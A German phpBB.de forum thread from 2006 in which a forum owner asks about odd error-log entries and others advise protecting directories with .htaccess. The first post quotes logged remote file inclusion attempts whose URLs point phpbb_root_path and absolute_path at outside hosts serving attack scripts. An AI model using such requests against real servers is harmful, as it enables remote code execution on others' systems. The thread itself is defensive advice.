phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Seltsame Errorlog-Einträge

https://www.phpbb.de/community/viewtopic.php?t=133466

Seite 1 von 1

Seltsame Errorlog-Einträge

Verfasst: 16.10.2006 20:45
von bbill
Hallo zusammen,

seit neustem finde ich solche Einträge in meinen Errorlogs:
http:********/components/com_minibb.php?absolute_path=http://193.239.120.188/alex.gif?
http:********/includes/functions.php?phpbb_root_path=http://www.tagdesschachs.de/news/tools/net/auto.txt?
http:********/includes/functions_mod_user.php?phpbb_root_path=http://revolvingdoorslammers.net/member ... titled.txt?
http:********/includes/functions_mod_user.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
usw.
Wird da vielleicht eine Schwachstelle getestet oder was hat es damit auf sich?
Bin für jede Info dankbar. :)

VG
bbill

Verfasst: 16.10.2006 22:36
von gn#36
phpbb_root_path ist eine Variable die den Pfad zum Stammverzeichnis deines Forums enthält. Wird diese - wie hier offenbar versucht wird - auf eine andere Domain/Verzeichnis umgeleitet kann im Ernstfall der Hacker eigene Skripte auf deinem Server ausführen. --> Das sind Hackingversuche.

Evtl. solltest du - falls noch nicht geschehen - das gesamte Includes Verzeichnis per HTACCESS schützen (hier im Board existieren ein paar Themen dazu). Außerdem sollten alle Dateien, die in Benutzerkontakt geraten sollen diese Variable direkt am Anfang setzen. Die phpBB eigenen Dateien tuen dies, außerdem gibt es eine Konstante die gesetzt wird (IN_PHPBB) und in allen anderen Dateien, die nicht in Benutzerkontakt geraten sollen als erstes Abgefragt wird. Sollte die Variable nicht definiert sein verweigert die Datei alle weiteren Dienste. Dies sollte allerdings auch in sämtlichen zusätzlichen Dateien von Mods so sein. Naja, ansonsten erfährst du zu diesem Thema auch in der Suche dieses Boards sicher mehr.

Verfasst: 16.10.2006 23:44
von bbill
Zuerst mal danke für die Infos.
Evtl. solltest du - falls noch nicht geschehen - das gesamte Includes Verzeichnis per HTACCESS schützen (hier im Board existieren ein paar Themen dazu).
Peinlich, dass ich das bisher noch nicht gemacht habe. :oops:
Die Verzeichnisse includes und db sind nun geschützt.

VG
bbill

Verfasst: 17.10.2006 09:26
von cYbercOsmOnauT
Wenn Du schonmal dabei bist, solltest Du auch das admin Verzeichnis schützen. ;)

Gruß,
Tekin

Verfasst: 17.10.2006 09:50
von bbill
cYbercOsmOnauT hat geschrieben:Wenn Du schonmal dabei bist, solltest Du auch das admin Verzeichnis schützen. ;)
Moin Moin! :)
Wenn ich mich in den Adminbereich klicke; da reicht es wohl nicht, dass ich mich dort jedesmal als User anmelde, oder?

VG
bbill

Verfasst: 17.10.2006 10:50
von larsneo
da reicht es wohl nicht, dass ich mich dort jedesmal als User anmelde, oder?
nein, denn die htaccess soll in erster linie davor schützen, dass einzelne dateien aus dem /admin folder direkt von aussen aufgerufen werden.

Verfasst: 17.10.2006 16:54
von bbill
Ok, danke für eure Hilfe! :)
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de